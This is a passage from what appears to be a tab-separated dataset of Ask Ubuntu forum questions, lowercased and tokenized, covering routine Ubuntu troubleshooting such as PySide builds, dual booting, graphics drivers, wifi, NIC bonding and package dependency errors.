ca n't decode byte 0xe2 in position 98 : ordinal not in range ( 128 ) i also tried to install by building it myself , as from instructions at site : https : //github.com/pyside/pyside-setup but i also received similar problem : [ 81 % ] building cxx object libshiboken/cmakefiles/libshiboken.dir/typeresolver.cpp.o [ 83 % ] building cxx object libshiboken/cmakefiles/libshiboken.dir/shibokenbuffer.cpp.o linking cxx shared library libshiboken-python2.7.so /usr/bin/ld : /usr/local/lib/libpython2.7.a ( abstract.o ) : relocation r_x86_64_32 against `.rodata.str1.8 ' can not be used when making a shared object ; recompile with -fpic /usr/local/lib/libpython2.7.a : could not read symbols : bad value collect2 : ld returned 1 exit status make [ 2 ] : *** [ libshiboken/libshiboken-python2.7.so.1.2.1 ] błąd 1 make [ 1 ] : *** [ libshiboken/cmakefiles/libshiboken.dir/all ] błąd 2 make : *** [ all ] błąd 2 error : error compiling shiboken can anyone tell me why this is happening ? i have been reinstaling cmake , and qt several times by various methods but nothing helped . i think that this may be caused by two verions of python i have on my ubuntu ( 2.6 and 2.7 ) . in past i have used pyqt4 on python 2.6 , and it worked well , i also installed for test pyside on python 2.6 and it worked also .
346203	ubuntu dual boot windows 7 partition is not shown properly	i tried to install ubuntu 13.04 in my system along with windows 7 . i selected try something else while installing ubuntu . i have 1tb hdd , partitioned to 4 drives but ubuntu displays only 2 ( 700gb and 290gb ) . i could n't locate the partition that i made ubuntu installation . also i was unable to install it along with windows 7 . please advise me with a step-by-step solution . thank you in advance .
346208	is it possible to burn updated ubuntu packages on cd/dvd media	is it possible to install the necessary updates and packages for ubuntu 12.04 , then save in cd/dvd media . because , every time i install the os , then choosing ubuntu from the grub screen after restarting ; it keeps on flashing many times so i have to shut it down .
346210	how to emulate a right mouse button click on touchscreen ?	my new touchscreen laptop does not have the menu button ( i.e . the one behaves like a right mouse click ) - the one usually next to the right ctrl . since you can not left click by touch , i am trying to create a custom keyboard shortcut for alt gr for this function ( under system > keyboard > shortcuts > custom shortcuts ) when using the xev command with an onboard keyboard ( that has the menu button ) , i have found out that the button info is : keyrelease event , serial 42 , synthetic no , window 0x4800001 , root 0xab , subw 0x0 , time 2544690 , ( 1236,607 ) , root : ( 1302,1050 ) , state 0x0 , keycode 135 ( keysym 0xff67 , menu ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false however , i have no idea what to do with this info ... btw i am using a ubuntu 13.04 . any help would be most appreciated ...
346211	tracker-store and tracker-miner-fs eating up my cpu on every startup	whenever i start my laptop the process tracker-store and tracker-miner-fs eats up my cpu between 30-40 % for 10-15 minutes . i am on ubuntu 12.04 . what does these processes do ? how to get rid of processes ?
346212	windows `` jumping '' between monitors when scale plugin used	i have two monitors . i am very particular as to which window goes to which monitor ( e.g . firefox always on the left side ; terminals on other workspaces always maximized on the left monitor ; r graphics always on the right monitor etc. ) . i use the scale plugin with the `` initiate window picker for all windows '' binding to switch between windows . i also use the option `` use device with pointer '' of the `` place windows '' plugin ( that way , when opening a window , it goes to the monitor that i want it to go ; however , the behavior i 'm about to describe happens also when the option `` use active device '' is selected ) . however , often when i use the scale plugin to jump between windows placed on different workspaces , it jumps from one monitor to the other . most frequently it moves from the monitor on the left hand side to the monitor on the right . it annoys the hell out of me , because i then feel compelled to drag the window back to the left side . it never happens if i do not switch between workspaces . i think it might be due to the `` place windows '' options and the `` scale '' plugin options that i use together . you see , when i initiate window picker for all windows , most of the windows , for some reason , get minimized on the right hand monitor , like this : then when i select one of the windows on the right , the cursor is on the right hand side of the screen ; and so maybe the `` place window '' plugin gets called and puts the window there ( because it is both , the active device and the device with the cursor ) . so here is a before calling window picker and after calling window picker screenshot : before : then i use window picker to switch to a window on another workspace , and again to switch back to the initial workspace with the firefox window : after : question : what can i do to prevent this behavior ? i mean , apart from using window picker for all workspaces .
346213	debug flash 11.8 applications on ubuntu	is it really not possible to install a debugger version of flash player 11.8 on ubuntu ? i 'm developing a flash application on fdt , and i installed the latest flash debugger version from the adobe website ( which is 11.2 ) i disabled the flash 11.8 version on google chrome and enabled the 11.2 debug version . now when i run my application , it says , you need flash 11.6 or higher . what do i do ? i 'm running ubuntu 12.04 lts .
346214	can not upgrade bind9	this is the output at my current installation , after running apt-get upgrade or apt-get dist-upgrade user @ localhost : ~ # apt-get -f upgrade reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be upgraded : bind9 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/335 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of bind9 : bind9 depends on libbind9-80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of libbind9-80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on libdns81 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of libdns81 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on libisc83 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of libisc83 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on libisccc80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of libisccc80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on libisccfg82 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of libisccfg82 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on liblwres80 ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of liblwres80 on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . bind9 depends on bind9utils ( = 1:9.8.1.dfsg.p1-4ubuntu0.5 ) ; however : version of bind9utils on system is 1:9.8.1.dfsg.p1-4ubuntu0.7 . dpkg : errono apport report written because the error message indicates it 's a follow-up error from a previous failure . r processing bind9 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : bind9 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit : apt-cache policy bind9 results : bind9 : installed : 1:9.8.1.dfsg.p1-4ubuntu0.5 candidate : 1:9.8.1.dfsg.p1-4ubuntu0.7 version table : 1:9.8.1.dfsg.p1-4ubuntu0.7 0 500 http : //mirror.sov.uk.goscomb.net/ubuntu/ precise-updates/main i386 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main i386 packages *** 1:9.8.1.dfsg.p1-4ubuntu0.5 0 100 /var/lib/dpkg/status 1:9.8.1.dfsg.p1-4 0 500 http : //mirror.sov.uk.goscomb.net/ubuntu/ precise/main i386 packages
346215	simple method to upgrade realtek wifi driver in ubuntu 12.04	i have ubuntu 12.04 running on a thinkpad edge 535 . the kernel is `` linux thinkpad 3.8.0-30-generic # 44~precise1-ubuntu smp '' . the network controller is a `` realtek semiconductor co. , ltd. rtl8188ce 802.11b/g/n wifi adapter ( rev 01 ) '' . the firmware/driver files are : -rw-r -- r -- 1 root root 13540 dec 11 2012 rtl8192cfw.bin -rw-r -- r -- 1 root root 16014 dec 11 2012 rtl8192cufw.bin -rw-r -- r -- 1 root root 20526 dec 11 2012 rtl8192defw.bin -rw-r -- r -- 1 root root 88856 dec 11 2012 rtl8192sefw.bin -rw-r -- r -- 1 root root 129304 dec 11 2012 rtl8712u.bin -rwxr-xr-x 1 root root 22996 jul 11 08:43 rtl8723fw_b.bin -rwxr-xr-x 1 root root 11662 jul 11 08:43 rtl8723fw.bin the network connection drops very consistently , about every 3 minutes . i have verified that it 's not the wireless router . on the realtek site , there appears to be a much new firmware/driver package from 2013 . how do i use the file on the realtek site to upgrade my outdate driver ? yes , i 've read all the posts here and on other websites and tried everything . there are no clear direction anywhere detailing how to simply upgrade the built-in driver from 2011 with the more recent version .
346216	i ca n't install ati drivers ubuntu 12.04	i have a sony vaio laptop with a gpu ati mobility hd4650 , and i want to install fglrx drivers but every time i try to do so i get an error . the title of the error is : fglrx kernel failed to build . the fglrx.0.crash is the following : problemtype : package dkmsbuildlog : dkms make.log for fglrx-8.960 for kernel 3.8.0-30-generic ( i686 ) mon sep 16 14:06:37 eest 2013 amd kernel module generator version 2.1 kernel includes at /lib/modules/3.8.0-30-generic/build/include not found or incomplete file : /lib/modules/3.8.0-30-generic/build/include/linux/version.h dkmskernelversion : 3.8.0-30-generic date : mon sep 16 14:06:43 2013 duplicatesignature : dkms make.log for fglrx-8.960 for kernel 3.8.0-30-generic ( i686 ) amd kernel module generator version 2.1 kernel includes at /lib/modules/3.8.0-30-generic/build/include not found or incomplete file : /lib/modules/3.8.0-30-generic/build/include/linux/version.h fglrxbuildlog : amd kernel module generator version 2.1 . active kernel : uname -a = linux kormoranos-vgn-fw41m-h 3.8.0-30-generic # 44~precise1-ubuntu smp fri aug 23 17:33:45 utc 2013 i686 i686 i386 gnu/linux uname -s = linux uname -m = i686 uname -r = 3.8.0-30-generic uname -v = # 44~precise1-ubuntu smp fri aug 23 17:33:45 utc 2013 . target kernel : uname -a = linux kormoranos-vgn-fw41m-h 3.8.0-30-generic # 44~precise1-ubuntu smp fri aug 23 17:33:45 utc 2013 i686 i686 i386 gnu/linux uname -s = linux uname -m = i686 uname -r = 3.8.0-30-generic uname -v = # 44~precise1-ubuntu smp fri aug 23 17:33:45 utc 2013 . kernel includes at /lib/modules/3.8.0-30-generic/build/include not found or incomplete file : /lib/modules/3.8.0-30-generic/build/include/linux/version.h package : fglrx packageversion : 2:8.960-0ubuntu1.1 sourcepackage : fglrx-installer title : fglrx 2:8.960-0ubuntu1.1 : fglrx kernel module failed to build apportversion : 2.0.1-0ubuntu17.4 architecture : i386 dependencies : adduser 3.113ubuntu2 base-passwd 3.5.24 binutils 2.22-6ubuntu1.1 busybox-initramfs 1:1.18.5-1ubuntu4.1 coreutils 8.13-3ubuntu3.2 cpio 2.11-7ubuntu3 cpp 4:4.6.3-1ubuntu5 cpp-4.6 4.6.3-1ubuntu5 debconf 1.5.42ubuntu1 debianutils 4.2.1ubuntu2 dkms 2.2.0.3-1ubuntu3.1 dpkg 1.16.1.2ubuntu7.1 [ modified : sbin/start-stop-daemon ] findutils 4.4.2-4ubuntu1 fontconfig 2.8.0-3ubuntu9.1 fontconfig-config 2.8.0-3ubuntu9.1 gcc 4:4.6.3-1ubuntu5 gcc-4.6 4.6.3-1ubuntu5 gcc-4.6-base 4.6.3-1ubuntu5 ifupdown 0.7~beta2ubuntu8 initramfs-tools 0.99ubuntu13.2 initramfs-tools-bin 0.99ubuntu13.2 initscripts 2.88dsf-13.10ubuntu11.1 insserv 1.14.0-2.1ubuntu2 iproute 20111117-1ubuntu2 keyboard-configuration 1.70ubuntu5 klibc-utils 1.5.25-1ubuntu2 libacl1 2.2.51-5ubuntu1 libattr1 1:2.4.46-5ubuntu1 libaudio2 1.9.3-4 libblkid1 2.20.1-1ubuntu3 libbz2-1.0 1.0.6-1 libc-bin 2.15-0ubuntu10.4 libc6 2.15-0ubuntu10.4 libdb5.1 5.1.25-11build1 libdbus-1-3 1.4.18-1ubuntu1.4 libdrm-intel1 2.4.43-0ubuntu0.0.2 libdrm-nouveau1a 2.4.43-0ubuntu0.0.2 libdrm-radeon1 2.4.43-0ubuntu0.0.2 libdrm2 2.4.43-0ubuntu0.0.2 libexpat1 2.0.1-7.2ubuntu1.1 libffi6 3.0.11~rc1-5 libfontconfig1 2.8.0-3ubuntu9.1 libfontenc1 1:1.1.0-1 libfreetype6 2.4.8-1ubuntu2.1 libgcc1 1:4.6.3-1ubuntu5 libgcrypt11 1.5.0-3ubuntu0.2 libglib2.0-0 2.32.3-0ubuntu1 libgmp10 2:5.0.2+dfsg-2ubuntu1 libgomp1 4.6.3-1ubuntu5 libgpg-error0 1.10-2ubuntu1 libice6 2:1.0.7-2build1 libjpeg-turbo8 1.1.90+svn733-0ubuntu4.1 libjpeg8 8c-2ubuntu7 libklibc 1.5.25-1ubuntu2 liblcms1 1.19.dfsg-1ubuntu3 liblocale-gettext-perl 1.05-7build1 liblzma5 5.1.1alpha+20110809-3 libmng1 1.0.10-3 libmount1 2.20.1-1ubuntu3 libmpc2 0.9-4 libmpfr4 3.1.0-3ubuntu2 libncurses5 5.9-4 libncursesw5 5.9-4 libnih-dbus1 1.0.3-4ubuntu9.1 libnih1 1.0.3-4ubuntu9.1 libpam-modules 1.1.3-7ubuntu2 libpam-modules-bin 1.1.3-7ubuntu2 libpam0g 1.1.3-7ubuntu2 libpciaccess0 0.12.902-1ubuntu0.2 libpcre3 8.12-4 libpixman-1-0 0.24.4-1 libplymouth2 0.8.2-2ubuntu31.1 libpng12-0 1.2.46-3ubuntu4 libqt4-dbus 4:4.8.1-0ubuntu4.4 libqt4-declarative 4:4.8.1-0ubuntu4.4 libqt4-network 4:4.8.1-0ubuntu4.4 libqt4-script 4:4.8.1-0ubuntu4.4 libqt4-sql 4:4.8.1-0ubuntu4.4 libqt4-xml 4:4.8.1-0ubuntu4.4 libqt4-xmlpatterns 4:4.8.1-0ubuntu4.4 libqtcore4 4:4.8.1-0ubuntu4.4 libqtgui4 4:4.8.1-0ubuntu4.4 libquadmath0 4.6.3-1ubuntu5 libselinux1 2.1.0-4.1ubuntu1 libslang2 2.2.4-3ubuntu1 libsm6 2:1.2.0-2build1 libstdc++6 4.6.3-1ubuntu5 libtiff4 3.9.5-2ubuntu1.5 libtinfo5 5.9-4 libudev0 175-0ubuntu9.4 libuuid1 2.20.1-1ubuntu3 libx11-6 2:1.4.99.1-0ubuntu2.2 libx11-data 2:1.4.99.1-0ubuntu2.2 libxau6 1:1.0.6-4 libxaw7 2:1.0.9-3ubuntu1 libxcb1 1.8.1-1ubuntu0.2 libxcursor1 1:1.1.12-1ubuntu0.1 libxdmcp6 1:1.1.0-4 libxext6 2:1.3.0-3ubuntu0.1 libxfixes3 1:5.0-4ubuntu4.1 libxfont1 1:1.4.4-1 libxi6 2:1.6.0-0ubuntu2.1 libxinerama1 2:1.1.1-3ubuntu0.1 libxkbfile1 1:1.0.7-1ubuntu0.1 libxmu6 2:1.1.0-3 libxpm4 1:3.5.9-4 libxrandr2 2:1.3.2-2ubuntu0.2 libxrender1 1:0.9.6-2ubuntu0.1 libxt6 1:1.1.1-2ubuntu0.1 libxxf86vm1 1:1.1.1-2ubuntu0.1 linux-headers-3.2.0-53 3.2.0-53.81 linux-headers-3.2.0-53-generic 3.2.0-53.81 linux-headers-generic 3.2.0.53.63 linux-libc-dev 3.2.0-53.81 lsb-base 4.0-0ubuntu20.3 make 3.81-8.1ubuntu1.1 makedev 2.3.1-89ubuntu2 module-init-tools 3.16-1ubuntu2 mount 2.20.1-1ubuntu3 mountall 2.36.4 multiarch-support 2.15-0ubuntu10.4 ncurses-bin 5.9-4 passwd 1:4.1.4.2+svn3283-3ubuntu5.1 patch 2.6.1-3 perl-base 5.14.2-6ubuntu2.3 plymouth 0.8.2-2ubuntu31.1 procps 1:3.2.8-11ubuntu6 sed 4.2.1-9 sensible-utils 0.0.6ubuntu2 sysv-rc 2.88dsf-13.10ubuntu11.1 sysvinit-utils 2.88dsf-13.10ubuntu11.1 tar 1.26-4ubuntu1 ttf-dejavu-core 2.33-2ubuntu1 tzdata 2013d-0ubuntu0.12.04 ucf 3.0025+nmu2ubuntu1 udev 175-0ubuntu9.4 upstart 1.5-0ubuntu7.2 [ modified : sbin/initctl ] util-linux 2.20.1-1ubuntu3 x11-common 1:7.6+12ubuntu2 x11-xkb-utils 7.6+4 xkb-data 2.5-1ubuntu1.3 xserver-common 2:1.11.4-0ubuntu10.13 xserver-xorg-core 2:1.11.4-0ubuntu10.13 xz-utils 5.1.1alpha+20110809-3 zlib1g 1:1.2.3.4.dfsg-3ubuntu4 distrocodename : precise distrorelease : ubuntu 12.04 distrovariant : ubuntu installationmedia : ubuntu 12.04.3 lts `` precise pangolin '' - release i386 ( 20130820.1 ) markforupload : true packagearchitecture : i386 procversionsignature : ubuntu 3.8.0-30.44~precise1-generic 3.8.13.6 tags : precise ubuntu uname : linux 3.8.0-30-generic i686 unreportablereason : please work this issue through technical support channels first . upgradestatus : no upgrade log present ( probably fresh install ) i also tried to install the drivers from amd website but again i get an error . is there anything i can do about it ? ? ?
346218	how can i boot in ubuntu or remove ubuntu from my system	i am a newbee to ubuntu . well this might happen to be a repeated question of a sort but i would like to ask it here as i could not find the answer for my exact case . i am trying install ubuntu 12.04 lts on my new dell inspiron 5520 which came with a pre loaded windows 8 but some how it was not getting completed . at last after reading different blogs and forums like this , i could finally install it ( i could run thru the process ) and installed ubuntu on my machine . but now the problems are , a . when i start my laptop sometimes i see the grub but it never displays existing windows 8 . to make something clear here , while installation ubuntu did n't detected the existing windows 8 os but i still went ahead and installed it . the gnu/grub location is in the separate partition of ubuntu . how can i get the entry of window 8 in the grub ? b. ubuntu does n't boots giving different errors each time . c. if i want to remove ubuntu , how can i remove it now and at least restore the old windows 8 booting ? so apparently i am not able to boot my machine in the normal way as there is no windows entry in the grub and ubuntu does n't boots ... .. : ( can anyone please help me out here ... .
346220	how to remove `` number of items '' listed at the end of every folder name ?	how to get rid of the `` number of items '' displayed/listed at the end of every folder name ?
346222	want to replace ubuntu 13.04 with windows7	i have ubuntu 13.04 as the only os ( no dual boot ) . i want to remove it and install windows 7 but my computer is not detecting any bootable discs or usb 's to boot from .
346223	i can see wireless networks but i ca n't connect any of them !	i used to be able to connect to free wireless networks and to my own wireless network , but when i tried to connect to a wired network i did one thing : restarted the network-manager in the terminal . since then i ca n't connect the any wireless network and never got to connect/test my wired one ( i could not get it to work , that is why i did that ) . could someone help me with this problem , because i ca n't seem to find any post with this same problem or a good answer . i tried to edit my wireless connection and deleted it in order to try to connect again but , like i said , the problem is i ca n't connect to any of them , it is n't a single connection problem . i used this command : sudo service network-manager restart i rebooted my laptop several times too . this happened a few days ago unfortunatly switching it off and on does n't affect my wireless strange behaviour , and also tried the wpa_cli command by advise and the output was : wpa_cli v1.0 copyright ( c ) 2004-2012 , jouni malinen < j @ w1.f1 > and contributors this program is free software . you can destribute it and/or modify it under the terms of the gnu general public license version 2 . alternatively , this software may be distributed under the terms of the bsd license . see readme and copying for more details . could not connect to wpa_supplicant - re-trying i left the command running about 1h and it did n't finish . i made the wpa_supplicant.config file and wrote : network= { ssid= '' ubuntu '' scan_ssid=1 key_mgmt= '' wpa-psk '' psk= '' password '' } when i ran the wpa_supplicant -i eth1 -c path_to_config_file the output was : line 4 : invalid key_mgmt ' '' wpa-psk '' ' line 4 : no key_mgmt values configured . line 6 : failed to parse network block . failed to read or parse configuration path_to_config_file . then i tried to fix the problem by removing the quotes from wpa-psk and ran the command again . the output was this : ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument eth1 : trying to associate with 00:14 : a4:38 : bc:3d ( ssid='ubuntu ' freq=2462 mhz ) eth1 : association request to the driver failed eth1 : associated with 00:00:00:00:00:00 eth1 : ctrl-event-disconnected bssid=00:14 : a4:38 : bc:3d reason=0 or this ( randomly alternating between them ) : ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument eth1 : trying to associate with 00:14 : a4:38 : bc:3d ( ssid='ubuntu ' freq=2462 mhz ) eth1 : association request to the driver failed eth1 : associated with 00:14 : a4:38 : bc:3d eth1 : wpa : 4-way handshake failed - pre-shared key may be incorrect eth1 : ctrl-event-disconnected bssid=00:14 : a4:38 : bc:3d reason=0 and there was also this line of code : wpa : no ssid info found ( msg 1 of 4 ) it never reached to ( msg 4 of 4 ) .
346225	bring all open terminal windows forward using a script	i am trying to use a script suggested for an answer i asked earlier , however i am having trouble getting it to work . the script should bring all instances of a program ( whose name is passed as an argument ) forward . here is a copy of the script : # ! /bin/bash program= $ @ wmctrl -l | while read window ; do if [ [ `` $ window '' == * '' $ program '' * ] ] ; then echo `` debug : i bring $ window '' code=`echo `` $ window '' | cut -f 1 -d `` `` ` wmctrl -i -a $ code fi done i have added a keyboard shortcut in preferences whose command is : bash /home/michael/scripts/bring-all-windows.bash terminal it works fine for other applications like gedit but i get no response when i try it with terminal , terminal or gnome-terminal . does anybody know why this might happen ?
346227	system running in low graphics mode after testdisk	after a successful install of ubuntu 12.04 , i decided to recover some lost file with testdisk . when it finished my 320gb harddrive had been completely fulled and it didnt has any free space . then i restarted my netbook again and this `` low grapthics mode '' error popped . i couldnt started ubuntu . i tried to erase some files via booting ubuntu with an usb stick but unfortunately it says that im not authorised to erase any data from my local hard disk . here is my question : how can i erase files from my harddrive ?
346228	not able to destroy service as agent-state is down	i am unable to destroy service as on of the unit agent says its down . i see that this bug has been fixed as stated here unit destruction depends on unit agents but i am not getting whats the solution to the problem ? i am running juju 1.13.3-raring-amd64 . here is output of juju status , quantum-gateway : charm : local : precise/quantum-gateway-56 exposed : false life : dying units : quantum-gateway/0 : agent-state : down agent-state-info : ( installed ) agent-version : 1.12.0 life : dying machine : `` 20 '' public-address : opnw02.master
346230	network-manager can not install , dependency issue	i accidently installed connmanager , it removed my network-manager and network-manager-gnome . now i can not connect to my wifi and ethernet connection . i tried to install network-manager from source ( latest version ) but it had dependency issues . now when i am connecting internet through usb-modem . but still i can not install network-manager and network-manager-gnome using apt-get -f it shows the following error : apt-get -f install network-manager network-manager-gnome reading package lists ... done building dependency tree reading state information ... done network-manager is already the newest version . the following package was automatically installed and is no longer required : libllvm2.8 use 'apt-get autoremove ' to remove them . suggested packages : network-manager-openvpn-gnome network-manager-vpnc-gnome the following packages will be upgraded : network-manager-gnome 1 upgraded , 0 newly installed , 0 to remove and 728 not upgraded . 1 not fully installed or removed . need to get 0 b/404 kb of archives . after this operation , 3,214 kb disk space will be freed . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of network-manager-gnome : network-manager-gnome depends on libgnome-bluetooth7 ( > = 2.27.8 ) ; however : package libgnome-bluetooth7 is not installed . network-manager-gnome depends on libnm-glib2 ( > = 0.8~rc2~git.20091229t135236.302e62d ) ; however : package libnm-glib2 is not installed . network-manager-gnome depends on libnm-util1 ( > = 0.8~a~git.20090930t162132.866d48b ) ; however : package libnm-util1 is not installed . network-manager-gnome depends on libnotify1 ( > = 0.4.5 ) ; however : package libnotify1 is not installed . network-manager-gnome depends on libnotify1-gtk2.10 ; however : package libnotify1-gtk2.10 is not installed . network-manager ( 0.9.4.0-0ubuntu4.3 ) breaks network-manager-gnome ( < < 0.8.99 ) and is installed . version of network-manager-gnome to be configured is 0.8-0ubuntu3.1 . libnm-gtk0 ( 0.9.4.1-0ubuntu2 ) breaks network-manager-gnome ( < < 0.9.1.90-0ubuntu2 ) and is installed . version of network-manager-gnome to be configured is 0.8-0ubuntu3.1 . gnome-bluetooth ( 3.2.2-0ubuntu5 ) breaks network-manager-gnome ( < < 0.9.0-3 ) and is installed . version of network-manager-gnome to be configured is 0.8-0ubuntu3.1 . libnm-gtk-common ( 0.9.4.1-0ubuntu2 ) breaks network-manager-gnome ( < < 0.9.1.90-0ubuntu2 ) and is installed . version of network-manager-gnome to be configured is 0.8-0ubuntu3.1 . dpkg : error processing network-manager-gnome ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : network-manager-gnome e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and ifconfig shows : lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:152 errors:0 dropped:0 overruns:0 frame:0 tx packets:152 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:12592 ( 12.5 kb ) tx bytes:12592 ( 12.5 kb ) ppp0 link encap : point-to-point protocol inet addr:100.101.120.10 p-t-p:10.64.64.64 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1500 metric:1 rx packets:12852 errors:0 dropped:0 overruns:0 frame:0 tx packets:12958 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:10903035 ( 10.9 mb ) tx bytes:1972515 ( 1.9 mb ) how can i revert my system back ? i am using ubuntu 12.04 32-bit .
346232	opencl device missing	i am using latest catalyst drivers from amd ( kubuntu 13.04 ) . previously ( say one month ago ) am using opencl 1.2 for my pyopencl worked great with three computing devices 1 . turks 2 . devastater 3 . authenticamd but recently it is showing only two computing devices ( same driver ) . i checked with clinfo and amd_codexl devastater authenticamd how can i bring back the third computing device ?
346243	module nvidia is not found error - bumblebee	today i 've installed bumblebee with nvidia-current , but when i check if bumblebee is ok ( bumblebee-config ) , i can read this [ error ] module `` nvidia '' is not found . what can i do ? thanks you in advance
346246	how to install ubuntu packard bell	i have a packard bell computer around 3 years of use and i am trying to get rid of xp and install ubuntu . however , every time that i try it freezes on the language selection and them comes on the top of that screen a message : error 8000 reading sector 3234234234 ... at the end i get a message : uncompression error , system halted . i also tried using a pen-drive , a different cd , lubuntu , asking for help of the gods , nothing results ... anyone can help ? the model of the computer is : utow - sun / imedia mc1538
346249	i get a blank screen when i ctrl-alt-f2 in ubuntu 12.04	i have just noticed that i can no longer log in another text shell in my ubuntu 12.04 . appart from that , sometimes my pc hangs as it boots , i.e . it does not bring the gui , until i try several times to , even in recovery mode sometimes . can someone help me , if you have any idea how to fix this problem .
346251	how do i copy my whole ubuntu 12.04 installation to a usb flash and to a new partition	i initially made a 13 gig partition for my ubuntu installation and that running out of space . also i originally gave half my disk space to windows 7 which i hardly use . i wish to erase everything - give windows about 20 % ( begrudgingly ) and increase my ubuntu share . i wish to copy my 13 gig installation to a usb flash . re-partition copy back the ubuntu to the increased partition . update grub2 question : is it just a question of booting into a live-distro selecting my 13 gig ubuntu and dragging it over to my usb flash ? or do i have to worry about things like sym-links etc ? any other hints will be appreciated .
346254	how can i ungroup icons in unity launcher	for me , it would be much more intuitive to have multiple icons in the launcher for each application window i have open . for example : if i have a few fire fox windows open there exists a single icon with a few white ticks next to it . i have to click the icon and then pick out the window from the screen and click it . it 's not always easy to pick out which window is the one you want from the miniature windows . with multiple icons , like destops os 's have traditionally been , i click the window icon once and my window moves to the front . one click . : )
346257	install alongside windows 8 is not working	i really want to try out and become a full time user of ubuntu on my laptop so for the moment i have setup a dual boot on my windows 8 hp envy m6 laptop . to do this , i shrank my windows 8 partition to create 100gb empty space that the ubuntu installer could use to install itself to . i then followed these instructions with ubuntu 13.04 x64 as my distro of choice . http : //www.makeuseof.com/tag/tired-of-windows-8-how-to-dual-boot-windows-ubuntu/ i selected the option within ubuntu to install alongside windows 8 at first . i then later tried the manual option to no avail . when i restart my machine it just boots straight into windows . the install booted up in uefi mode absolutely fine and when i press f9 to get my boot options , ubuntu 13.04 shows up as an option . however , selecting this option will just cause the machine to boot in windows 8 . i 'm at a real loss at the moment as to what i can do as the process should not be this difficult ( at least it was n't with legacy booting ) but if nobody can solve this issue it looks as if i 'll have to abandon the idea of linux altogether . any help would be greatly appreciated . cheers , jezzipin
346258	multiple nic bonds in 12.04	i have installed ubuntu server 12.04 x64 on an hp proliant dl380 g7 ( dual cpus , 24gb ram , raid 5 - 300gb ) . clean install , nothing else is on the machine . virtualizing this machine is n't an option or i would already have done that . i am trying to bond the network connections of the built in 4-port broadcom nic with an hp 331t adapter ( broadcom ) . both are gigabit and are recognized by ubuntu ( latest firmware has been applied to everything ) . i am trying to create two bonds ( bond0 and bond1 ) , corresponding to the front-end and back-end network . each bond has a single connection to each nic . i have done an extensive amount of troubleshooting/reading over the past 2 days and have had a little bit of success , but i have run into issues at every step . most of what i read out there deals with creating a single bond between multiple interfaces . there is virtually no information on creating multiple bonds over multiple interfaces . i am looking for anyone 's help/input . it would be greatly appreciated ! i figure someone out there has done this in ubuntu before . as it stands right now , i have both bonds mostly working . if i only wanted a single bond , i would have no problems . the second bond is where the problems start . the server hangs at boot trying to start bond1 ( which is the 2nd bond ) . after around 5 minutes , the server finally boots and everything works fine ( including bond1 ) restarting the networking service causes bond1 to become unresponsive . i have to restart the entire machine to get bond1 back . trying ifup bond1 results in various issues like bond1 is already configured/is already up . i have also tried sudo networking service stop & & sudo networking service start , same issue . config files : ( have tried virtually every combination of parameters- the following is what got me the furthest ) /etc/modprobe.d/bonding.conf : alias bond0 bonding options bond0 mode=4 lacp_rate=1 miimon=100 max_bonds=2 alias bond1 bonding options bond1 mode=4 lacp_rate=1 miimon=100 max_bonds=2 /etc/network/interfaces ( no gateway needed on bond1 - backend ) : auto eth3 iface eth3 inet manual bond-master bond0 auto eth4 iface eth4 inet manual bond-master bond0 auto bond0 iface bond0 inet static address 10.100.0.60 netmask 255.255.255.0 gateway 10.100.0.1 dns-nameservers 10.100.0.53 10.100.0.54 post-up ifenslave bond0 eth3 eth4 pre-down ifenslave -d bond0 eth3 eth4 auto eth0 iface eth0 inet manual bond-master bond1 auto eth1 iface eth1 inet manual bond-master bond1 auto bond1 iface bond1 inet static address x.x.x.x netmask 255.255.255.0 post-up ifenslave bond1 eth0 eth1 pre-down ifenslave -d bond1 eth0 eth1 /etc/modules : loop lp rtc bonding
346259	why does ubuntu opens the folder cointaining the file instead the file itself ?	when i 'm trying to open a file via search in the ubuntu dash or asking chrome to open downloaded file , nautilus opens a window containing this file instead of opening file in a related application . system is ubuntu 13.04 . inb4 i installed nemo ( as i am more familiar with it instead of ugly new nautilus ) , but when switched back to nautilus 3.4.2 with some patches . any help here ? i guess there 's something wrong with launch command in default applications .
346260	i have a error with ubuntu skd	i installed qt creator from developer ubuntu with the command , but i open this program and i go to create a project windows and i do n't find the ubuntu 's templates . also , if i create another project , appear `` no valid kit found '' . sorry if you do n't any mean tell me : ) but i 'm spansh ... thanks ! i 'm tried unistall and re-install program , but not worked
